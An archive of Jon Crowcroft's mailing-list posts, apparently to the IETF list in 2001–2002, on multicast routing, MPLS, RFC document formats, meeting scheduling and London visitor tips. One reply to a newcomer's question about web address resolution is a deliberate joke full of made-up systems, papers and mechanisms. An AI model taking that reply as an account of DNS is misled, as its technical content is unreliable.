Re: comments on Friday scheduling, etc.

2002-01-18 Thread Jon Crowcroft


some people don't live in the US but do have families

50% of us are
flying out saturday to be there for sunday all day meetings, flying
eastwards on friday, to get back mid day saturday, we lose 2 weekends.
compare this to intra-US flite to and from, i don';t think esxtending
friday is sustainable. we don't have that much more work, we need better
scheduling is all

in fact, there;s lots of evidence that work is done BETTER when time
available for it is reduced..esp. when particpants re jetlagged.

tired working groups make tired decisions. like driving, this can be
dangerous...

j.




Re: WebAddress resolutions

2001-09-21 Thread Jon Crowcroft


In message [EMAIL PROTECTED], USELESS SSELES
U typed:

Am wondering how and where the
 webaddress mappings taking place? Meaning if I type
 www.xyz.com in a browser and (say) this xyz.com is
 running on 212.34.54.89, then does my Internet Service
 Provider lookup every place right from 0.0.0.0 to
 255.255.255.255? And finally is that how my ISP gets a
 match and says voila I got it and fetches the HTML
 page on xyz.com?

that depends what OS they are running - if its
portholes 7.3, then yes, but if its leanix 11.0, esp. the one
running microlite underware release 2 or grater, then there's a hash
function from every www to every ip addr which was reported in
acm sitcomm 77 (not online) although there's a claim that it was in
fact discivered in station exx by albert turning and colleagues in
1943, but under the british 50 year rule, has not been published yet
(the british secret service count years differently to, but i can't
tell you their algorithm as that is secret to).
 

one reason why www sites are so low to look up is that the portholes
operating system actually also looks up 
aaa.xyz.com
bbb.xyuz.com
...
in case you might want to look at those too soon

in fact, its pretty clever - if you have the internationalized version
it also looks them up in 143 different alphabets, and also caches the
kanji and other iconic maps for you client side

the key advantage of  portholes is that once you have accessed one web
site, yopu need never look at any others, and you certainyl dont need
any of those pesky hard to use search engines.

the main down side is that you also need a peta-store - there's some
you're not allowed into countries that are cyberabies virus
free with a peta-bite - there's good evndicen that most people with a
petabite have the virus somewhere on disk and its only a matter of
time before everyone else gets it

the other neat thing is that after one access, you can hang up your
ISP account for ever

the neat thing about the leanix hash function is that it operates the
other way around, so that you dont need more than 1 pixel display, 1
byte of memory and 1 cps processor - in fact you dont need any users
either, which can be a bonus if you are a sysadmin [ref LISA 1999
paper on users are the enemy]

hash functions are very useful for many things - for example you can
invite your friends around to an before work hash function - it makes a
nice change to an after work barbeque

   jon




Re: MPLS,IETF, etc..

2001-09-04 Thread Jon Crowcroft



a node might be simpler but the system composed of a graph of suvch
nodes more complex - you (as switch or router vendors) might get to
make your h/w or s/w simpler at the level of forwarding, bu the overal
syusytem that manages routes and traffic might be less simple and
(therefore) more failure prone 

van jacobson's keynote at SIGCOMM 2001 (last week in san diego) made
this point very clearly.

local optimsiations often aren;t, globally.

In message [EMAIL PROTECTED]
com, Natale, Robert C (Bob) typed:

  From: Bob Braden [mailto:[EMAIL PROTECTED]]
  Sent: Saturday, September 01, 2001 1:29 PM
 
 Hi Bob,
 
  Simplicity, in this case, seems to be in the eye of the beholder.
 
 There is certainly some universal truth in that statement.
 
  I don't get why label swapping is any simpler than hop/hop forwarding.
 
 It's simpler, IMHO, because it accomplishes more and does so in
 a way that is globally beneficial.
 
 That is, MPLS (in its fundamental goals) goes a long way toward
 integrating L3 and L2 in a way that leverages the strengths and
 discounts the weaknesses of the two paradigms:
 
L3/routing/packet/connectionless
L2/switching/circuit/connection-oriented
 
 The concept of scaling hop/hop forwarding via more capable hardware
 has its benefits (mostly of the short-term economic variety...which
 can be quite powerful, I agree), but is in the long run (I believe)
 inferior (in terms of scalability and synthesis, at least) to a more
 fundamental architecture/software solution.
 
 Thanks,
 
 BobN
 

 cheers

   jon




type/length/value based e-mail list filters

2001-07-30 Thread Jon Crowcroft


once upon a time, in a far off corner of a small field
in north london, a small CS department developed a cute
x.400 mail system, that incorporated relaying between most 
extant e-mail protocol channels (smtp, uucp, grey book etc)
and accomodated translation of multimedia content including
other mm formats than mime - 

its possible to configure a system like this to fan out e-mail
traffic onto a set of sub-typed or super=typed  sub-lists, applying a
set of configurable filters (actually applying the transitive closufre
of a set of filters) to the content en route

it ought to be easy to re-configure a majordomo like tool to then
allow subscription to typed lists. this would allow us folks that dont
care about word viruses, but also dont care FOR receiving megabytes of
word garbage either, to receive only the text part of a message.

this seems more democratic (in the hand of the receiver) but more
scalable (does filtering nearer source) than proposals to date that
have been made such as enforced filtering of all types of content, or
whathaveyou

the idea would be to use fitler languages as part of the subscription
process.it could include length limits and other things if one
liked to allow people on the move with merely a PDA to be safe,
secure and performant too...it could even be role based if one wanted
to be trendyand it could make the world a les globally manged, but
cybernautically more ecoliogically diverse, and therefore richer,
place


yrs
three gentleman from genoa

p.s. for those of you with filters configured to send virus reports
as recipient alerts to the LIST, be aware that if you are that stupid,
you are probably being socially engineered to get around all your
over-zealous defenses anyhow, so you are wasting not just our time,but
your own too.




alt.ietf for london

2001-07-24 Thread Jon Crowcroft


see

http://www-mice.cs.ucl.ac.uk/ietf/

for our alternative guide to london for ietfers

now has added links on the Proms and on telephone wiring 

 cheers

   jon




don't panic.

2001-05-14 Thread Jon Crowcroft




london ietf metadata

2001-05-09 Thread Jon Crowcroft


i was promted yesterday by a couple of (brit) WG chairs to send this:

remember -there's some info about london at:
URL:http://www-mice.cs.ucl.ac.uk/ietf/
as suggested by ietfers  - more suggestions always welcome too

note london in august is v popular with tourists as there are so
few cows here so book soonest to avoid disappointment

cheers
jon




Re: Don't fix it!

2001-04-30 Thread Jon Crowcroft


  What. Does that imply the preference of redesign to revision in IETF ?
 No.
 If it ain't broke, don't fix it is a colloquial saying meaning
 Do not embark on repairs of things that do not need repair.  It
 means Don't repair a non-broken window.  Don't repair a working lamp.
 Don't fix software that's already working correctly.

it is also understood to refer to systems so complex that often even
their creators dont understand how they work, so that people are
afraid to alter them while they appear to be working,  in case
they stop doing so.

the internet is just such a system, although i would say that e=mail
is one of the parts probably best udnerstood (not by me, but i have
met people who seem to get it:-)

cheers

jon




Re: Carrier Class Gateway

2001-04-26 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Steven M. Be
llovin typed:

 In message [EMAIL PROTECTED], Bill Manning writes:
 
  semantically confused.  why would sailors be on the
  bridge? (the one over the canal)
 
 Right -- they should be using routers, not bridges.
 
but there's only 7 seas - 802.1d scales fine to that
size AS

also, we've got enough jitter what with 6 hours mean delay but 6 hours
variance - do you really want to add BGP convergence time problems too?
and what of multihoming - its only a matter of time begfore someone on
some continent wants a canal to two other oceans...

 cheers

   jon




Re: N:N multicast with extra address space?

2001-04-20 Thread Jon Crowcroft


there's a discussion on how to make some simple classes of
assymetric multisender apps work with
SSM, but there's not really anything useful
for genuine multi-peer applications - what is needed is to
revitalise the work on bidir pim, and then retrofit the SSM
addressing (.e. what we proposed in rama/sm work) and maybe now is
the right time to do that since the SSM stuff is seeing deployment,
so we wont be distracting people from their main agenda anymore.

In message [EMAIL PROTECTED], Hugh Fisher typed:

 
  I'm building applications for collaborative 3D graphics
  using SRM (actually LRMP) multicast on the local Ethernet.
  They're peer to peer systems, not in the new buzzword of
  the day sense, but in all being equal participants rather
  than a client/server design.
 
  My systems have multiple senders, but a per-group routing
  tree rather than per-source is fine. In the future I'll
  want (like many VR/distributed sim folk) to be able to
  allocate from a large range of multicast addresses, say
  12 bits or more. Waiting for IP6 isn't an option.
 
  The "Interconnections" 2nd ed book describes a shared tree
  multicast with 8 byte group IDs that would fit my needs
  very nicely. Can anyone point me to a working group/mailing
  list where I can find out more about this?
 
 -- 
  Hugh Fisher
  ANU/CSIRO VE Lab
 

 cheers

   jon




Re: IPv9 ??

2001-04-18 Thread Jon Crowcroft


for those of you in the US
april fools day dates from the introduction of the gregorian calendar
in the 16th century, and invovled moving the start of the year from
apr 1 to jan 1

in france, a posson d'avril is a rather nice phrase for a person who
is subject of one of these (supposed harmless) pranks - obviously they
hadn't heard of the IRS:-)

of course, 
IPv5 is alive

In message [EMAIL PROTECTED], Gl
en Morehead typed:

 For those of you outside the U.S. (and, I suppose, parts of Europe), April 1
 is known as April Fool's Day.  People play practical jokes on each other;
 some of them are rather elaborate and created just for April Fool's.  If you
 scan back through the RFC index, there are well over a dozen RFCs published
 on April 1 through the years that are bogus - some of them pretty
 sophisticated, and most of them fun (the transmission of IP packets over
 avian carriers, updated with QOS, is one of my favorites.)
 
 When you have an hour or so, take a look at these creative and fun
 "Informational" or "Experimental" RFCs.
 
 Regards,
 Glen
 
 -Original Message-
 From: Jiwoong Lee [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, 17 April 2001 21:35
 To: [EMAIL PROTECTED]
 Subject: Re: IPv9 ??
 
 
 What fun! I've heard a lot about IPv5, but it's first time to see IPv9!
 
 It seems that IPv6-IPv9 appeared as solutions to IPv4 address shortcoming,
 as indicated IAB Routing and Addressing Task Force. Am I right ?
 
 One quick question: Why IPv1-IPv3 left untouched ?
 
 Jiwoong
 
 
 - Original Message -
 From: "Srihari Raghavan" [EMAIL PROTECTED]
 To: "Wang Hui" [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Sent: Tuesday, April 17, 2001 8:16 PM
 Subject: RE: IPv9 ??
 
 
  See RFCs 1606 and 1607.
 
  They are dated 1 April. Hopefully that should give some idea :)
 
  /Srihari
 
  -Original Message-
  From: Wang Hui [mailto:[EMAIL PROTECTED]]
  Sent: Tuesday, April 17, 2001 4:51 AM
  To: [EMAIL PROTECTED]
  Subject: IPv9 ??
 
 
  I happen to find out a new Internet Protocol called IPv9 in a search
 engine.
  I dont know what is IPv9?  What's the relationship between IPv9 and IPv6
 or
  else?
 
  Could anyone give me some URLs to follow.
 
  Thanks in advance.
 
  -Wang Hui
 
 
 
 

 cheers

   jon




london IETF information

2001-04-01 Thread Jon Crowcroft


IETFers visiting london may wish to check out a few differences
between the way europeans (and the UK is part of "yurp") say things in
english, as this is the dominant language of the IETF meeting, but of
course, american english is not the dominant dialect in blighty.

so first off, when discussing the Internet Protocol ("IP"), in common
south eastern pronunciation, be sure to say
"oy pay" (try it now with a friend - if yo uahve a copy of any brit
movies or tv shows on video, see if you can match this to, say, the
way that benny hill, or john cleese, or say hugh grant.
It is especially important to say this correctly when in a pub.

Next, of course, we do get visitors from the other side of the
channel (unless they are cut off by fog). These people are charming,
and do their utmost to speak english, with yet more variations being
bought in - thus, when discussing the next generation, be sure to say
"ee peh veh seess", when talking with a french person.
And when discoursing freely about the woes of BGP with an Italian,
make sure that youi pronounce all 3 "rs's" in "rrrouting".

now, don't get confused about the topic when a german suddenly appears
to be diverging onto tree beings in tolkein - the "ent to ent"
principle is alive and well there too.

of course, most europeans are aware that "rowting" is part of
carpentry #101 (or what happened to napolean's army  in russia), and
for once this usage will put US citizens in a minority.

note that TCP is a trade mark in england (actually its a medicinal
product), but luckily, unlike a certain company, they are not likely
to send cease and disist letters when you talk about it (perhaps we
should see if a legal firm has a prior trademark on "rake off").


if you are working on GRE, L2TP or PPTP, note that in london these are
"tube" mechanisms.

if you work on service differentiation, be aware of class, and note
that a police functions is normally referred to as balls.

with these few rules you should get by in london famously

see you in august
jon
url:http://www-mice.cs.ucl.ac.uk/ietf/




Re: connecting RFC April Fool dots

2001-03-31 Thread Jon Crowcroft


 This should be fertile ground for topics for PhD students.
 We still have PhD students, yes?
 
yes, but no faculty to advise them - see below


of course, if we fixed the multicast and the mbone (or used
akamai/inktomi/idigital island, foobarbaz.com) we'd be able to
leverage the internet to advise 75 phds simulataneously

but first we have to fix the bandwidth and multicast and may be that
is the phd that is really needed

 We're entering a recession, right? Ostermann was wrong, right?
 http://www.acm.org/sigcomm/sigcomm98/Ostermann/slide2.html

he was right... but the axes need some adjustment
 
 We _do_ need standards in this area.

"i have my standards - of course, for a big enough fee, i will happily change
them" to paraphrase groucho...

j.

-- Forwarded message --
Date: Fri, 30 Mar 2001 17:14:02 -0500
From: David Farber [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: IP: COLLEGES FACE A SHORTAGE OF FACULTY MEMBERS IN COMPUTER  SCIENCE:
Edupage, March 28, 2001



The number of computer-science doctoral graduates continues to
fall, according to a new report from the Computer Research
Association. About 880 computer-science doctoral degrees were
awarded last year, a decline from the previous year's total of
about 950. In 1992, over 1,100 computer-science doctoral degrees
were given. The main reason for the decline, said Penn State
University computer-science professor and report co-author Mary
Jane Irwin, is the number of potential doctoral students who
instead choose to enter industry because the salaries are so
attractive. Irwin has noticed this trend is especially strong
among foreign nationals coming to U.S. institutions. She said
foreign students "apply to a Ph.D. program, come to the U.S.,
and find out that there are jobs for them even with just a
master's degree. So they change to a master's, complete the
program, and then go out and get a job." The Computer Research
Association report reveals that the popularity of computer science
degrees below the doctoral level continues to rise. Last year saw
a 20 percent rise in the number of computer-science bachelor and
master's degrees awarded.
(Chronicle of Higher Education Online, 27 March 2001)








Re: Kudos to MSP IETF hosts other ramblings

2001-03-25 Thread Jon Crowcroft


actually, the problem i have with the message was that there is an
assumption about an attitude - i mean al i meant was i wanted to get
good engineering work done in the normal way all effective work gets done
given it wasnt actually a WG it couldnt actualy make any decisions,
but it mioght get some design done (albeit it could then be thrown out
by a WG which is fine by me...)

i think the value of the IETF is its informality - the implied litigious
american attitude about "open" = "everyone MUST attend" etc would
break the IETF even more than pure size. if people want to head that
way then we might as well charge corporate membershipo, ban
individuals and go for the full ITU model

i dunno...

In message [EMAIL PROTECTED], Brian E Carpenter typed:

 Design teams and editorial teams are part of our process,
 and they may as well meet in the pub as anywhere. As long
 as their results are put in front of the WG, I don't see
 a problem here.
 
Brian
 
 Margaret Wasserman wrote:
  
  Not to pick on Jon specifically, but how is this common IETF
  attitude consistent with the IETF's stated commitment to
  open process?
  
  At 06:52 AM 3/23/01 , Jon Crowcroft wrote:
  
  also,the wireless access fro mthe pub was inspired! we got really
  serious bar bof work done without tourists kibbitzing
 

 cheers

   jon




Re: Kudos to MSP IETF hosts other ramblings

2001-03-23 Thread Jon Crowcroft


well adding another enue to the IETF seems to me to be more open

also note the _process_ is to do with WG last call etc - we were'd`nt
doing anymore than talking about bugs in i-ds that we wrote (and all
authoprs were present) - this is what bar bofs are usually for - i
dont see that this is any different fro mauthors conversing over email
before releasing a new id to thr world

finally:
bofs are not Wgs. they dont do nuffink til they get chartered so they
are not really in the process. bar bofs arent even bofs. they dont do
anythign til the get sobered.


In message 4.2.2.20010323090914.01abfd30@localhost, Margaret Wasserman typed:

 
 Not to pick on Jon specifically, but how is this common IETF
 attitude consistent with the IETF's stated commitment to 
 open process?
 
 At 06:52 AM 3/23/01 , Jon Crowcroft wrote:
 
 also,the wireless access fro mthe pub was inspired! we got really
 serious bar bof work done without tourists kibbitzing
 

 cheers

   jon




Re: rfc publication suggestions

2001-03-15 Thread Jon Crowcroft


In message [EMAIL PROTECTED], "Rahmat M. Samik-Ibrahim" typed:

 No rocket science, but perhaps archaeology.
 In the early 1980s, a unix box (68ks, vaxen, et.al.) came
 with a multi-volume manuals, including an nroff guide.
 In this millennium, not all distros have nroff guides.
 
 Who is still using this dino technology anyway?

i use it coz once you have a template, all wp packages are the same
effort (esp. for standards) - i also have templatex for latex and word
to do the same thing and have worked with people who use frame - i
dont understand all this nonsense - they are all equally bad at
somethings  and some better at others - wysiwyg is pretty much
a) bad for people with rsi
b) none existent in reality anyhow given the whims of rendering and
typesetting backend s/w - 

actually, groff man pages are not what you need - what you need are
MACRO manual pages - groff_ms(7) refers  you to ms(7) which is
propietary as far as i know (otherise i'd post it:-)

by the way, "dino" lasted 140M years - 70 times as long as humans so
far, and 7M times as long as IPv4.do you have another 20 year old WP
source file you can still process apart from groff?
(rhetorical question, dont answer that:-)


 cheers

   jon




Re: Multicast

2001-03-08 Thread Jon Crowcroft


again, i don't know if the WHOLE IETF list wants to see this
discussion, nor if IDMR (which now looks at a fairly small piece of
the multicast picture) wants to be cc:d - the right place for this
discussion is probably pim, and possibly ssm, - idmr is about ready to
close down 

the right solution (imho) is a two protocol world
1/ PIM SSM for 1-many apps with IGMPv3 for join/leave
2/ PIM bidir/BGMP (basically equiv. to hierarchical PIM) for many sender with
some smart inter-domain RP assignment done as part of the
brokering/peering arrangements between providers - this latter needs
lots of work
i) PIM bidir needs finishing
ii) the interdomain part needs implementing (not hard) and detailed
specification

as ISPs get use to intradomain SSM, they may start to comtemplate some
PIM SM, then PIM bidir customers/applications (a while off, but
slowly) - then,when they understand traffic engineering internally for
these applications, they may start to consider how to do inter-domain
peering and traffic engineering 

on any plausible timeframe for this, routers maybe able to handle the
state for the many-sender protocols (certainyl they wont be today or
tomorrows routers), so as long as state scales linear or sublinear in
#many-sender flows, it is not out of the question (not great, but not
out of the question) - hierchical approaches based on bidir trees can
do some aggregation to get it better than s,g (if we believe we will
have a lot of apps anyhow with genuine inter-domain, globally visible
state required. ... it aint obvious - a lot of apps we are thinking
about can be global, but stay mainly within a single tier 1 provider,
until they say auto-tunnel thru the access provider. some apps can
just use small numbers of SSM flows from the server site. lots of
alternatives 

anyhow, as i say, this discussion is already ongoing in the relevant
groups (including mboned) and direcrorates...not on idmr and ietf:-)

In message [EMAIL PROTECTED], #PA
THIK GUPTA# typed:

 Hi,
 
 It is true that there are certain scalability issues with Multicast. However
 the solution of this is to have a very good InterDomain multicast routing as
 well as Intra Domain multiast routing protocols. With that the problem of
 host affecting the entire routing core is greatly reduced.
 The protocols like CBT and PIM-SM were developed because it was found that
 protocols like DVMRP and PIM-DM cannot scale. It is also neceesary to note
 the fact that PIM-SM is only efficient for the sparesely disributed hosts
 and it is a Receiver initiated protocol. This has significant advantage over
 flood and prune protocols like DVMRP.
 
 If you think of the scenario where there are very less hosts receving the
 session and why dont we just send data directly, then this solution cannot
 scale. The whole purpose of multicast is lost. The server will be burdened
 and each unicast stream will contribute more to a single multicast stream.
 
 Cheers,
 Pathik Gupta
 
 -Original Message-
 From: Gunnar Lindberg [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, March 08, 2001 4:13 PM
 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Subject: Re: Multicast
 
 
 Please explain what's wrong with my take on multicast scalability:
 
 Every time a new sender shows up, the entire multicast core (RPs,
 right now those running MSDP in the default free zone) has to be
 informed. To "show up", the host just starts sending data.
 
 Every time a new receiver shows up, its nearest RP has to initiate
 a data distribution path (tree) torwards the sender(s). This is
 likely to involve at least some of the core routers.
 
 Scalability problems:
 
 1)   An indivivual sender - host, my Linux PC - affects routing
  information in the entire router core. Just send data.
  There are a few hosts on the Internet.
 
 2)   As if his wasn't enough, consider the potential for DoS-
  attacks. The recent Ramen worm was the first(?) example;
  who can claim it was the last?
 
 Assume technology evolves fast enough to solve 1). We still have 2).
 
 My claim is that it doesn't scale to allow individual hosts to affect
 the Interet core routing system. What do I miss?
 
  Gunnar Lindberg
 

 cheers

   jon

), in memory of lowell george




Re: Some data Re: Again: Number of Firewall/NAT Users

2001-03-07 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Kyle Lussier typ
ed:

   "is anyone aware of any estimations of fraction of Internet users
   who are behind firewalls and NATs?"
 
 How about for business users?  If the assumption can be made
 that most Q3 players are home based (which would probably
 have a lower incidence of NATs) ~20% sounds high.  Of
 course that could be because of sevice providers.

according to some measurements, most game players are at WORK.
+
in some parts of the world, most HOME users aere behind NATs
 
 But does anyone have a better idea for business users?

 cheers

   jon




Re: Multicast

2001-03-07 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Ali Boudani typed:

 First the CBT protocol was created to use shared tree solutions because
 DVMRP and the other dense mode protocols werent scalable. there were
 many problems with CBT (which is bidirectional) so PIM-SM was cretaed
 which provide some switching (between shared tree and source tree). and
 after that there is some discussions about the bidirectional PIM, which
 is like CBT.
 Are we in circle here or what ??
 
not really. the mainstream current multicast action is concentrating on
 single source (and on single source reliable multicast transport)
since we didn't feel we understood all the complications of ANY of the
multiple source schemes for IP or reliable(e.g. interdomain
routing, and multiple source semantics for reliable) - 

there were'nt really "problems" with CBT apart from we never managed
to get a router vendor to committ to an implmenetation which we could
deploy and learn from - tony ballardie got a lot of the details out,
but the two implementaions i know of never saw light of day.bidir
pim is cool, bgmp is cool, but action in implementation/details/spec
is waiting on getting the PIM SSM stuff completely shaken down

its all part of a good learning experience and (as any good s/w
engineer might say) its the norm:-)
 

 cheers

   jon




Re: Multicast

2001-03-07 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Ali Boudani typed:

 Isnt SSM just a particular case of PIM??

the right place for this discussion is
  SSM [EMAIL PROTECTED], 

SSM is a subset of PIM SM, roughly, and relies (sort of) on IGMPv3 (at
least on a subset of equiv. functionality).

 It is the specifications for just specific sources but they arent adressing
 the multicast in general.
 am I right ?

not quite - i dont think the whole IETF list is the right place for
this one - see
http://www.ietf.org/html.charters/ssm-charter.html

i think since the ssm work is close to done, we'll see work resume on
bidir (s/cbt/pim-bidir:-) soon , and similalrly in the RMT work
see
http://www.ietf.org/html.charters/rmt-charter.html
a lot of building blocks are close to done (prob. about a year) then
we'll see some work on multiple source (the latent demand for multiple
source applications is imho underestimated, but until we can fix the
more immediate problems with supporting 1-many, we can't really expect
people to deploy many-to-many extensively- other problems being
addressed are concerned with having good solutions for multicast security (see 
http://www.ietf.org/html.charters/msec-charter.html
and for many-to-many, for congestion control (to meet transport area
requirements)

i think (but of course i am usually wrong) that we may see progress on
this in 2002...

 Jon Crowcroft wrote:
 
  In message [EMAIL PROTECTED], Ali Boudani typed:
 
   First the CBT protocol was created to use shared tree solutions because
   DVMRP and the other dense mode protocols werent scalable. there were
   many problems with CBT (which is bidirectional) so PIM-SM was cretaed
   which provide some switching (between shared tree and source tree). and
   after that there is some discussions about the bidirectional PIM, which
   is like CBT.
   Are we in circle here or what ??
 
  not really. the mainstream current multicast action is concentrating on
   single source (and on single source reliable multicast transport)
  since we didn't feel we understood all the complications of ANY of the
  multiple source schemes for IP or reliable(e.g. interdomain
  routing, and multiple source semantics for reliable) -
 
  there were'nt really "problems" with CBT apart from we never managed
  to get a router vendor to committ to an implmenetation which we could
  deploy and learn from - tony ballardie got a lot of the details out,
  but the two implementaions i know of never saw light of day.bidir
  pim is cool, bgmp is cool, but action in implementation/details/spec
  is waiting on getting the PIM SSM stuff completely shaken down
 
  its all part of a good learning experience and (as any good s/w
  engineer might say) its the norm:-)
   
 
   cheers
 
 jon
 

 cheers

   jon




Re: draft-many-gmpls-architecture-00.txt

2001-03-04 Thread Jon Crowcroft


In message [EMAIL PROTECTED], "J. Noel Chiappa" typed:

  From: Bob Braden [EMAIL PROTECTED]
 
  I agree with Noel's implication: are the Internet Drafts and RFCs
  becoming a vanity press?  

 Ah, Noel didn't mean to imply anything - I was just boggled at the size of
 the list of names.
 
there's 3 reasons i've seen that this happens commonly (please feel
free to add more:-)

0/ a bunch of people genuinely did write lots of little bits and then
some of them edited it togerther and just wanted to be fair

1/ a bunch of people want to emphasis some thing as really needing
doing, so they enlist lots of "co-authors" from the "great and the
good"

2/ vanity (or tenure track pressure, something thatcher got rid of in
the UK:-)

i spose it wastes a few storage and transmssion bytes, but does it do
much harm?


 cheers

   jon

btw, recently, we've been interviewing people for 2 chairs in the
department here and i found a couple of interesting things to do about
applicants was
1/ look in 
http://citeseer.nj.nec.com/cs
for citations of their work
2/ look in a search engine (google, for example) and 
run
link:http://personshomepage.edu
to see how many people link to their home page...

you can do this for rfc's and ietf wg's pages too of course:-)
(and sadly for i-d's even though they aren't sposed to be cited except
as the old work-in-progress (maybe we could allow "personal
communication" too? :-)

i have no idea of the meaning or validity of this, but it sure removes
noise like the number of authors (or number of revisions:-)





Re: HTML better for small PDAs

2001-02-27 Thread Jon Crowcroft


In message [EMAIL PROTECTED], joaquin.riveraro
[EMAIL PROTECTED] typed:

 Perhaps we ( the IETF ) should have a library of standard,
 downloadable translation / formatting tools that would help people to write
 in whatever format they choose, then convert it to the required ASCII.
 However, this would still not solve the problem os ASCII's poor diagram
 capability.
 
 I am sure that will help, while the discussion on the standard format goes on,
 the tools will be helpfull to everyone whatever the final decision should be.


there is no substitute for good graphics design skills/ability -
havign said that, some tools WOULD be nice - i think its irrelevant
whether the tools render the output as GIFs or PDF or ascii - the
problem some people appear to have is focusing.
in practice ,there's 3 or 4 diagram types:

1/ packet headers- here the conventions used in rfc791 onwards are
EXCELLENT since they are cpu agnostic- since they are also labelled
they are no more national language specific than a program is:-)
(e.g. C structure or Java ) 

2/ state machines - these are not too bad - yo ucan use the same
approach as is used in old 60s/70s flow charting/call graphing in
general, quite clearlythe most complex state machine (e.g. new PIM
SM spec, or TCP) are not too hard

3/ packet exchange examples (e.g. time sequence diagrams) - i think
these are trivial (except occasionally in multicast:-)
a tool for these would be pretty simple to build...
(something could back end off of emacs, powerpoint animations, ns
animations and magicpoint etc)

4/ topology based expostion (i.e. routing protocols) - these are
generally very hard - ascii makes you think a LOT, as i said before
about keeping the examples simple

any other?

so how about a project to develope some tools for the last trickier case
above? (btw, i dont see how XML helps one bit - PDF or PS are the only
options for platform independnt rendering, and even then there are
problems with portability and fidelity) - and specifying the actual
editing/wordprocessing toolset is not on!

 cheers

   jon

p.s. how mayny people really read a protocol spec on a PDA? i mean the
time i do it is when coding, and when coding i want the spec in a
window, the code in a window, gdb in another window, tcpdump in 2 more
- seriously.




Re: Why XML is perferable

2001-02-25 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Stephen McHenry typed
 
 On a more serious note, having done a lot of instruction over the years, it 
 shouldn't be about ego (I paid my "understanding dues" - everyone else 
 should too!!), it should be about communication... i.e., how quickly can we 
 effectively communicate complex concepts... 

excellent point

one of the bigest contributions to the internet standards process was
Rich Stevens (RIP) TCP/IP _Illustrated_ series - these clarify,
disambiguate and communicate many many areas of standards - i agree
wit hbob that protocol creators may not need the visualisation and
graphic detail in the early stages, but as you say, there are lots of
people implementing who need rapid ways of absorbing the ideas -

however, that doesn't mean this has to be in the i-d and RFC stages -
it can be in a myriad of other places such as books and trade press
journals where articles abound giving the further interpretation - and
do say in many languages too

cheers

j.




Re: Why XML is perferable

2001-02-23 Thread Jon Crowcroft


In message [EMAIL PROTECTED], gra
[EMAIL PROTECTED] typed:

 Let's consider a few basic principles.
 
ok - lots of good points below - a few responses...

 1.  Neither ASCII nor XML are ever displayed.  They are CODES for
 representing characters in a computer. It is the CHARACTERS ( glyphs ) that
 are displayed ( presented / rendered ). There is a mapping between the codes
 and the glyphs.

but the glyphs are in HARDWARE in many devices(e.g. printed on
keycaps, in printer wheels, in crt display chips etc)...

 2.  ASCII has a strictly limited set of characters and glyphs ( even the
 "international" version ), which can not represent many languages in the
 world, and does a poor job of rendering diagrams, pictures, etc.


yes, this point has been made a lot - however, the discipline of
getting a diagram into ascii art has OFTEN caused people in the ietf
to udnerstand the problem better (e.g. by choosing the most
parsimonious topology to explain a partiocular routing problem)

 3.  As some people have emphasised, the importance of ASCII lies in the (
 American Standard Code for Information ) INTERCHANGE.  Interchange implies
 the ability to transfer in a manner which can be understood by both parties
 to the transfer. The MOST COMMON global method of transferring will be the
 most effective.

yes, yes, and yes..but also, collating, indexing, and searching -
manmy of the search engines are optimised to the roman alhpabet, the
english dictionary, and the english freqeuncy distribution of
words

 4.  Interchange does not guarantee understanding - either of presentation
 format or content.  I wouldn't like to have to deal with Einstein's Theory
 of Relativity ( content ), especially in Chinese ( format ).  ASCII does not
 interchange Chinese characters, so it's presentation format is NOT readily
 understandable by "most people".  
 
 5.  A more comprehensive coding scheme, such as the Universal Character Set
 ( ISO 10646 ) would allow many more characters and glyphs to be used.
 
 6.  The key to usage of encoding schemes is how widely they can be
 interpreted by character presentation ( or rendering ) applications ( word
 processors, etc. ), in mapping the internal codes to the glyphs rendered on
 the screen or on paper.  Applications which can render more characters would
 allow the use of larger code ranges and more characters.  
 
 Until something replaces ASCII as the most commonly available global
 interchange format ( and could it be HTML / XML ? ), it will remain the
 default.  That doesn't mean that we should just accept it for evermore.  If
 that principle were followed, we would still be drawing on cave walls and
 large red rock formations ( Ayres in Australia ! ), which are not very
 transportable !  
 
 One of the things that the IETF could, and in my opinion SHOULD, do it to
 make its documents available in several presentation formats, not to say
 languages.  Yes, we would still need a master copy and format, which could
 be ASCII, but other, more presentable formats, would make life easier for
 many people.  The ITU-T ( I'm sorry to mention it, but they have been doing
 this for decades ) publishes its documents in three languages. If the IETF
 is really working for the world, it should take a more global view and
 consider a similar sort of policy. Don't we have a work stream on
 internationalisation ?
 
 Of course, this sort of effort costs money - lots of it.  That's why the
 ITU-T charges for documents.  If you want it free, you take the IETF
 approach and get the inexpensive, ASCII, American language version.
 
thats why the ITU claims it charges. i think you overstate the
contrast. btw, as someone who has written documents in english english
for 20 years using ascii codes, i dont see your point about American
_language_ - coding for alhpabet doesnt necessarily code for language
(ever used greeklish?:-)

anyhow, the point about cost is good - basically, do people want to
think about a funding model for multi-lingual internet standards...?
worth a brief discussion (there are alternates to the ITU charging
model, clearly)

j.




Re: was Why we shouldn' use ASCII text (now censorship)

2001-02-23 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Jon Crowcroft typed:

 on another topic, we noticed that we cannot see certain sites that
 provide some interesgint IP anonymizing services -we ran a 
 traceroute -p xyzd to them and discovered that some hi-level ISPs are
 running some port filtering - interesting - should one peer with
 such folks given its hard to route around them as an end user?

 putting out the fire with gasoline...

my mistake - it was the egress from a site to an ISP that was admin
blocking the port - not an ISP - big error reading output from
traceroute -p on my part  -sorry: isps, not guilty; crowcroft, guilty.

sincerely

   jon




Re: Why we shouldn' use ASCII text

2001-02-22 Thread Jon Crowcroft


In message [EMAIL PROTECTED], Taylor Salman typed:


 ASCII text shouldn't be accepted because:br

 Pen and paper is by far the most portable format on the planet and
 beyond.

i disagree - 

i) the americans spent a lot of money on spaceworthy pens,
but the russians showed that PENCILS are fine

ii) paper burns at farenheit 451 (ref: burroughs, '63, truffaut '68], 
this many IETF meetings generate enough heat to ignite any draft being 
discussed if presented in this format

so we need to use pencil and (unprocessed) wood

j.




Re: Why we shouldn' use ASCII text

